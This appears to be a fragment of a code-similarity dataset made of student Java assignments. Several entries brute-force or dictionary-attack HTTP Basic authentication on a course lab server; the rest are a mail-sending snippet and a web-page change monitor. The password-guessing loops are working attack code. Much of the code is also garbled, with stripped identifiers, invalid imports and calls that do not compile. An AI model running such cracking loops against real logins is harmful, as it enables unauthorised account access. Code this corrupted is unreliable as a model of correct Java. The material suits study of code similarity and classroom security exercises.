\ \n\t \n\t os.writeBytes(\"DATA\\r\\n\");\n\n\t os.writeBytes(\"X-Mailer:\
\ Via Java\\r\\n\");\n\t os.writeBytes(\"DATE: \" + dFormat.format(dDate) + \"\
\\r\\n\");\n\t os.writeBytes(\"From: <@cs.rmit.edu.>\\r\\n\");\n\t os.writeBytes(\"\
: <@cs.rmit.edu.>\\r\\n\");\n\n\t os.writeBytes(\"Subject: updated\\r\\n\"\
);\n\t os.writeBytes(emailBody + \"\\r\\n\");\n\t os.writeBytes(\"\\r\\n.\\\
r\\n\");\n\t os.writeBytes(\"QUIT\\r\\n\");\n\n\t \n\t \n\t String responseline;\n\
\t while((responseline=is.readLine())!=null){ \n \n if(responseline.indexOf(\"\
Ok\") != -1) {\n break;\n }\n\t }\n\t}\n\tcatch(Exception\
\ e){ \n\t System.out.println(\"Cannot send email as error occurred.\"); \n\
\t}\n }\n else \n\tSystem.out.println(\"smtpSocket another variable\
\ is null!\");\n } \n catch(Exception e){ \n System.out.println(\"\
Host unknown\"); \n }\n } \n \n} \n\n\n"
- "\t\n\n\nimport java.io.*;\nimport java.net.*;\n\nimport java.util.*;\n\nimport\
\ java.misc.BASE64Encoder;\n\npublic class BruteForce {\n\n private String userId;\n\
\ private String password;\n\n private StringBuffer seed= new StringBuffer(\"\
aaa\");\n private int tries = 1;\t\n\n\n\t\n public BruteForce() {\n\n\n \
\ \n Authenticator.setDefault (new MyAuthenticator());\n }\n\n public String\
\ fetchURL (String urlString) {\n\tHttpURLConnection connection;\n\tStringBuffer\
\ sb = new StringBuffer();\n\tDate startTime, endTime;\n\tint responseCode = -1;\n\
\tboolean retry = true;\t\n\t\n URL url;\n startTime = new Date();\n \
\ \n System.out.println (\" time :\" + startTime);\n\n\twhile (retry == true)\n\
\t{\n\t\n\t try {\n\n\t\t\turl = new URL (urlString);\n\n\t\t\tconnection =\
\ (HttpURLConnection)url.openConnection();\n\n\t\t\tsetUserId(\"\");\n\t\t\tsetPassword(\"\
rhk8611\");\n\n\t\t\tSystem.out.println(\"Attempting get a response : \" +connection.getURL()\
\ );\n\t\t\tresponseCode = connection.getResponseCode();\n\t\t\tSystem.out.print(responseCode\
\ + \" \");\n\n\t\t\tif (responseCode == HttpURLConnection.HTTP_OK) \n\t\t\t{\n\
\t\t\t\tretry = false;\n\t\t\t\tSystem.out.println(\"**** ACCESS GRANTED *****\"\
);\n\t\t\t} else\n\t\t\t{\n\t\t\t\tretry = true;\n\t\t\t\tthrow new IOException(\n\
\t\t\t\t\t\"HTTP response : \" + String.valueOf(responseCode) + \n\t\t\t\t\t\"\
\\nResponse Message: \" +connection.getResponseMessage());\n\t\t\t\t\n\t\t\t}\n\
\n\t\t\tInputStream content = (InputStream)url.getContent();\n\t\t\tBufferedReader\
\ in = \n\t\t\tnew BufferedReader (new InputStreamReader (content));\n\t\t\t\
String line;\n\t\t\t\twhile ((line = in.readLine()) != null) {\n\t\t\t\t\tsb.append(line);\n\
\t\t\t\t}\n\t\t\t} catch (MalformedURLException e) {\n\t\t\t\t\n\t\t\t\tretry=false;\n\
\t\t\t\tSystem.out.println (\"Invalid URL\" + e.getMessage());\n\t\t\t} catch\
\ (IOException e) {\n\t\t\t\t\n\t\t\t\tretry=true;\n\t\t\t\tconnection = null;\n\
\t\t\t\tSystem.out.println (\"Error URL \\n\" + e.getMessage());\n\t\t\t}\n\t\
\t}\t\n\t\tendTime = new Date();\n\t\tSystem.out.print (\"Total Time taken :\"\
\ + (endTime.getTime() - startTime.getTime())/1000*60 + \" Minutes \");\n\t\t\
System.out.println ((endTime.getTime() - startTime.getTime())/1000 + \" Sec\"\
);\n\t\t\n\t\t\n\treturn sb.toString();\n }\n\n\n public static void main (String\
\ args[]) {\n\tBruteForce myGenerator = new BruteForce();\n\n\n\t\n\n\n\tSystem.out.println(\"\
Starting seed is : \"+ myGenerator.getSeed() );\n\tString pageFound = myGenerator.fetchURL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n\t\t\n\tSystem.out.println(\" ACCESSED\
\ ->\\n\" + pageFound);\n }\n\n class MyAuthenticator extends Authenticator\
\ {\n protected PasswordAuthentication getPasswordAuthentication()\n\t{\n\t\
\tString username = getUserId();\n\t\tString pass = getPassword();\t\n\t\tif (pass.equals(\"\
ZZZ\"))\n\t\t{\n\t\t\tSystem.out.println(\"\\nReached the end of combinations.\
\ EXITING.\\n\");\n\t\t\tSystem.exit(0);\n\t\t}\n\t\tif ((tries % 8) == 0 )\n\t\
\t{\n\t\t\tpass = \"\" + getNextPassword();\n\t\t}else \n\t\t{\n\t\t\tpass = \"\
\"+ getNextPasswordCase(\"\"+getSeed(), tries%8);\n\t\t}\n\t\ttries ++;\n\n\t\
\ System.out.println(tries + \" Authenticating with -> \" + pass);\n\n\t return\
\ new PasswordAuthentication (username, pass.toCharArray());\n\t \n }\n }\n\
\t\n\tpublic String getPassword()\n\t{\n\t\treturn this.password;\n\t}\n\n\tpublic\
\ void setPassword(String password)\n\t{\n\t\tthis.password = password;\n\t}\n\
\n\t\n\tpublic String getUserId()\n\t{\n\t\treturn this.userId;\n\t}\n\n\tpublic\
\ void setUserId(String userId)\n\t{\n\t\tthis.userId = userId;\n\t}\n\n\tpublic\
\ StringBuffer getNextPassword()\n\t{\n\t\tfinal int STRING_RADIX = 36;\n\t\t\n\
\t\tint changeDigit;\n\t\tint dig;\n\t\tchar cdig;\n\t\t\n\t\t\n\t\tchangeDigit\
\ = 2;\n\t\tif (getSeed().charAt(changeDigit) < 'z')\n\t\t{\n\t\t\tdig = Character.digit(getSeed().charAt(changeDigit),\
\ STRING_RADIX);\n\t\t\tdig = dig + 1;\n\t\t\tcdig = Character.forDigit(dig, STRING_RADIX);\n\
\t\t\tseed.setCharAt(changeDigit,cdig);\n\t\t\t\t\n\t\t} else\n\t\t{\n\t\t\t\n\
\t\t\tseed.setCharAt(2,'a');\n\t\t\t\n\t\t\t\n\t\t\tchangeDigit = 1;\n\t\t\tif\
\ (getSeed().charAt(changeDigit) < 'z')\n\t\t\t{\n\t\t\t\tdig = Character.digit(getSeed().charAt(changeDigit),\
\ STRING_RADIX);\n\t\t\t\tdig = dig + 1;\n\t\t\t\tcdig = Character.forDigit(dig,\
\ STRING_RADIX);\n\t\t\t\tseed.setCharAt(changeDigit,cdig);\n\t\t\t} else\n\t\t\
\t{\n\t\t\t\t\n\t\t\t\tseed.setCharAt(2,'a');\n\t\t\t\t\n\t\t\t\tseed.setCharAt(1,'a');\n\
\t\t\t\t\n\t\t\t\t\n\t\t\t\tchangeDigit = 0;\n\t\t\t\tif (getSeed().charAt(changeDigit)\
\ < 'z')\n\t\t\t\t{\n\t\t\t\t\tdig = Character.digit(getSeed().charAt(changeDigit),\
\ STRING_RADIX);\n\t\t\t\t\tdig = dig + 1;\n\t\t\t\t\tcdig = Character.forDigit(dig,\
\ STRING_RADIX);\n\t\t\t\t\tseed.setCharAt(changeDigit,cdig);\n\t\t\t\t}\n\t\t\
\t\t\n\t\t\t}\n\t\t\t\n\t\t}\n\n\t\treturn getSeed();\n\t\n\t}\n\n\tprivate StringBuffer\
\ getNextPasswordCase(String pwd, int inx)\n\t{\n\t\tStringBuffer casePwd = new\
\ StringBuffer(pwd);\n\t\tchar myChar;\n\t\tswitch (inx)\n\t\t{\n\t\t\tcase 1:\n\
\t\t\t\tmyChar = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t\tcase 2:\n\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1,\
\ Character.toUpperCase(myChar));\n\t\t\t\tbreak;\n\t\t\tcase 3:\n\t\t\t\tmyChar\
\ = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t\tcase 4:\n\t\t\t\tmyChar = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0,\
\ Character.toUpperCase(myChar));\n\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1,\
\ Character.toUpperCase(myChar));\n\t\t\t\tbreak;\n\t\t\tcase 5:\n\t\t\t\tmyChar\
\ = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0, Character.toUpperCase(myChar));\n\
\t\t\t\tmyChar = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t\tcase 6:\n\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1,\
\ Character.toUpperCase(myChar));\n\t\t\t\tmyChar = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2,\
\ Character.toUpperCase(myChar));\n\t\t\t\tbreak;\n\t\t\tcase 7:\n\t\t\t\tmyChar\
\ = pwd.charAt(0);\n\t\t\t\tcasePwd.setCharAt(0, Character.toUpperCase(myChar));\n\
\t\t\t\tmyChar = pwd.charAt(1);\n\t\t\t\tcasePwd.setCharAt(1, Character.toUpperCase(myChar));\n\
\t\t\t\tmyChar = pwd.charAt(2);\n\t\t\t\tcasePwd.setCharAt(2, Character.toUpperCase(myChar));\n\
\t\t\t\tbreak;\n\t\t}\n\t\treturn(casePwd);\n\t\t\n\t}\t\n\tpublic StringBuffer\
\ getSeed()\n\t{\n\t\treturn this.seed;\n\t}\n\n\tpublic void setSeed(StringBuffer\
\ seed)\n\t{\n\t\tthis.seed = seed;\n\t}\n\n\n\n} \n\n\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public\
\ class BruteForce {\n\n URLConnection conn = null;\n private static boolean\
\ status = false;\n\n public static void main (String args[]){\n BruteForce\
\ a = new BruteForce();\n String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
,\n \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
sentences:
- "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\n\
import java.net.*;\n\n\n\npublic class BruteForce\n{\n private URL url;\n \
\ private HttpURLConnection connection ;\n private int stopTime = 0;\n private\
\ int startTime = 0;\n private int count = 0;\n\n public BruteForce()\n\
\ {\n System.out.println(\"Process is running...\");\n startTime =\
\ System.currentTimeMillis();\n threeLetters();\n twoLetters();\n \
\ }\n\n public static void main (String args[])\n {\n BruteForce bf =\
\ new BruteForce();\n }\n \n public void threeLetters()\n {\n String\
\ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\
\ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\
\ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\
\ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] +\
\ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\
\ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n }\n }\n }\n }\n \n public\
\ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\
\ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\
\ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\
\ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \
\ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n }\n }\n }\n\n \n public void decision(String\
\ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
- "\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.net.*;\n\
\npublic class Dictionary extends Frame implements ActionListener {\n\n private\
\ TextField tf = new TextField();\n private TextArea ta = new TextArea();\n\n\
\ public void actionPerformed (ActionEvent e) {\n\t String s = tf.getText();\n\
\t String login=\"\";\n try{\n\t BufferedReader bufr = new BufferedReader\n\
\t\t\t(new FileReader (\"words1.txt\"));\n\t String inputLine=\"\";\n\n\n\n\t\
\ if (s.length() != 0)\n {\n\t\t inputLine = bufr.readLine();\n\t\t while\
\ ((inputLine != null) && (inputLine.length() != 3))\n\t\t {\n\t\t\t \n\t\t\t\
\ inputLine = bufr.readLine();\n\t\t }\n\n login=\":\"+inputLine;\n\
\t\t ta.setText (fetchURL (s,login));\n\t\t System.out.println(\"runing\"\
+login);\n\t }while(ta.getText().compareTo(\"Invalid URL\")!=0 || ta.getText().compareTo(\"\
Error URL\")!=0);\n\n\t System.out.println(\"The password is: \"+inputLine);\n\
}\ncatch(Exception ex){}\n\n }\n\n public Dictionary() {\n\n super (\"URL11\
\ Password\");\n\n \n add (tf, BorderLayout.LEFT);\n ta.setEditable(false);\n\
\ add (ta, BorderLayout.CENTER);\n tf.addActionListener (this);\n \
\ addWindowListener (new WindowAdapter() {\n public void windowClosing (WindowEvent\
\ e) {\n dispose();\n System.exit(0);\n }\n });\n \
\ }\n\n private String fetchURL (String urlString,String login) {\n StringWriter\
\ sw = new StringWriter();\n PrintWriter pw = new PrintWriter();\n\n try\
\ {\n URL url = new URL (urlString);\n\n \n MyAuthenticator =\
\ new MyAuthenticator();\n \n\n \n String encoding = new url.misc.BASE64Encoder().encode\
\ (login.getBytes());\n\n \n \n\n \n URLConnection uc =\
\ url.openConnection();\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n InputStream content = (InputStream)uc.getInputStream();\n\
\ BufferedReader in =\n new BufferedReader (new InputStreamReader\
\ (content));\n String line;\n while ((line = in.readLine()) != null)\
\ {\n pw.println (line);\n }\n } catch (MalformedURLException\
\ e) {\n pw.println (\"Invalid URL\");\n } catch (IOException e) {\n\
\ pw.println (\"Error URL\");\n }\n return sw.toString();\n }\n\
\n\n public static void main (String args[]) {\n Frame f = new Dictionary();\n\
\ f.setSize(300, 300);\n f.setVisible (true);\n }\n\n class MyAuthenticator\
\ {\n String getPasswordAuthentication(Frame f, String prompt) {\n final\
\ Dialog jd = new Dialog (f, \"Enter password\", true);\n jd.setLayout (new\
\ GridLayout (0, 1));\n Label jl = new Label (prompt);\n jd.add (jl);\n\
\ TextField username = new TextField();\n username.setBackground (Color.lightGray);\n\
\ jd.add (username);\n TextField password = new TextField();\n \
\ password.setEchoChar ('*');\n password.setBackground (Color.lightGray);\n\
\ jd.add (password);\n Button jb = new Button (\"OK\");\n jd.add\
\ (jb);\n jb.addActionListener (new ActionListener() {\n public\
\ void actionPerformed (ActionEvent e) {\n jd.dispose();\n }\n\
\ });\n jd.pack();\n jd.setVisible(true);\n return username.getText()\
\ + \":\" + password.getText();\n\n }\n }\n\n}\n \n\n class Base64Converter\n\
\ \n \n {\n\n public static final char [ ] alphabet = {\n\
\ 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L',\
\ 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n\
\ 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i', 'j',\
\ 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n\
\ 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n '4', '5', '6', '7',\
\ '8', '9', '+', '/' }; \n\n \n \n\n public static String encode\
\ ( String s )\n \n {\n return encode ( s.getBytes ( ) );\n\
\ }\n\n public static String encode ( byte [ ] octetString )\n \
\ \n {\n int bits24;\n int bits6;\n\n char [ ] out\n\
\ = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n\n \
\ int outIndex = 0;\n int i = 0;\n\n while ( ( i + 3 ) <=\
\ octetString.length )\n {\n \n bits24 = ( octetString\
\ [ i++ ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i++ ] & 0xFF )\
\ << 8;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 0;\n\n \
\ bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet\
\ [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out\
\ [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0\
\ ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6\
\ = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6\
\ ];\n }\n\n if ( octetString.length - i == 2 )\n {\n \
\ \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n \
\ bits24 |= ( octetString [ i + 1 ] & 0xFF ) << 8;\n\n bits6 = ( bits24\
\ & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\
\ bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n \
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n }\n else if ( octetString.length - i ==\
\ 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF )\
\ << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n out [ outIndex++ ] = '=';\n }\n\n \
\ return new String ( out );\n }\n\n \n \n }\n\n"
- "\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.Properties;\nimport\
\ java.security.*;\n\npublic class WatchDog\n{\n private String file,tempfile1,tempfile2,tempfile3;\n\
\tprivate final String host=\"yallara.cs.rmit.edu.\";\n private final String\
\ email=\"@cs.rmit.edu.\";\n private final String from=\"watchdog@cs.rmit.edu.\"\
;\n private final String subject=\"SUBJECT:Mail from Watchdog about the changes\
\ the web-.\";\n private String baseURL=\"\";\n\tprivate String msg;\n\tprivate\
\ boolean firstTime=false;\n public WatchDog(boolean flag)\n\t{\n\t\tfirstTime=flag;\n\
\t}\n\n public void startWatching(String[] urls,String fl)\n {\n\t\tfile=fl;\n\
\t\ttempfile1=fl+\"/temp1.log\";\n\t\ttempfile2=fl+\"/temp2.log\";\n\t\ttempfile3=fl+\"\
/temp3.log\";\n\t\tSystem.out.println(tempfile3);\n\n\t\tmsg=\"\";\n\t\tfor(;;)\n\
\t\t{\n\t\t\ttry\n\t\t\t{\n\n\t\t\t\tfor(int o=0;o<urls.length;o++)\n\t\t\t\t\
{\n\t\t\t\t\tfile=fl+\"/ass2_\"+o+\".log\";\n\t\t\t\t\tURL u=new URL(urls[o]);\n\
\t\t\t\t\tString f=u.getFile();\n\t\t\t\t\tString url=urls[o];\n\t\t\t\t\tif(f.lastIndexOf('.')<f.lastIndexOf('/'))\n\
\t\t\t\t\t{\n\t\t\t\t\t\turl=f.substring(0,f.lastIndexOf('/'));\n\t\t\t\t\t\t\
url=u.getProtocol()+\"://\"+u.getHost()+url;\n\t\t\t\t\t}\n\t\t\t\t\tSystem.out.println(url);\n\
\t\t\t\t\twatch(url);\n\t\t\t\t\tmsg=msg+\"\\n\\n\";\n\t\t\t\t}\n\t\t\t\tif(firstTime==false)\n\
\t\t\t\t{\n\t\t\t boolean flag=mail(msg);\n\t\t\t if(flag)\n\t\t\t\t\t\
System.out.println(\"mail sent\");\n\t\t\t\t else\n\t\t\t\t\tSystem.out.println(\"\
mail not sent\");\n \t\t\t\t Thread.sleep(1000*60*60*24);\n\t\t\t\t}\n\t\t\t\t\
else\n\t\t\t\t\tSystem.exit(0);\n\t\t\t}\n\t\t\tcatch(Exception e)\n\t\t\t{\n\t\
\t\t\te.printStackTrace();\n\t\t\t}\n\t\t}\t\t\t\n }\n\n\tprivate void watch(String\
\ url) throws IOException\n\t{\n\t\t baseURL=url;\n\t\t msg=msg+\"Going\
\ check the URL \"+url+\".\\n\";\n\t \n\t\t String pageText=getResource(url);\n\
\n\t\t\t String [] images=getImages(pageText);\n\n\t\t\t if(firstTime==false)\n\
\t msg= msg + checkChange(pageText,images);\t \n\n\t\t msg=msg+\"\
. Checked at \"+new java.util.Date(System.currentTimeMillis())+\".\";\n\n\t\t\
\ log(pageText,images);\n\n\t\t\tif(firstTime)\n\t\t\t\tSystem.out.println(\"\
Re-run the watchDog (without the First flag).\");\n\t}\n\tprivate String checkChange(String\
\ pageText,String [] images) throws IOException\n\t{\n\t\t\n\t\tPrintWriter out=new\
\ PrintWriter(new FileOutputStream(tempfile1));\n\t\tout.println(pageText);\n\t\
\tout.flush();\n\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\");\n\
\t\tout.flush();\n\t\tout.print();\n\t\tout=null;\n\n\t\tBufferedReader in1=new\
\ BufferedReader(new FileReader(file));\n\t\tBufferedReader in2=new BufferedReader(new\
\ FileReader(tempfile1));\t\n\t\tString msg=\"\\n\";\n \tString temp1=\"\
\",temp2=\"\",oldText=\"\",newText=\"\";\n\n\t\t\n\t\tBufferedReader in0=new BufferedReader(new\
\ FileReader(tempfile1));\n\t\twhile (temp1.equals(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
+\"\\n\")==false)\n\t\t{\n\t\t\ttemp1=in0.readLine();\n\t\t\ttemp1=temp1+\"\\\
n\";\n\t\t\tnewText=newText+temp1;\n\t\t}\n\t\tin0.print();\n\t\tin0=null;\n\t\
\t\n\t\tout=new PrintWriter(new FileOutputStream(tempfile1));\n\t\tout.println(newText);\n\
\t\tout.flush();\n\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
);\n\t\tout.flush();\n\t\tout.print();\n\t\tout=null;\n\t\tnewText=\"\";\n\t\t\
temp1=\" \";\n\n\t\twhile (temp1.equals(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
+\"\\n\")==false)\n\t\t{\n\t\t\ttemp1=in1.readLine();\n\t\t\ttemp1=temp1+\"\\\
n\";\n\t\t\ttemp2=in2.readLine();\n\t\t\ttemp2=temp2+\"\\n\";\n\t\t\toldText=oldText+temp1;\n\
\t\t\tnewText=newText+temp2;\n\t\t}\t\t\n\n\t\tin2.print();\n\t\tin2=null;\n\n\
\t\tout=new PrintWriter(new FileOutputStream(tempfile2));\n\t\tout.println(oldText);\n\
\t\tout.flush();\n\t\tout.println(\"~!@#$%^&*()_+`1234567890-=,./';[]<>?:{}|\"\
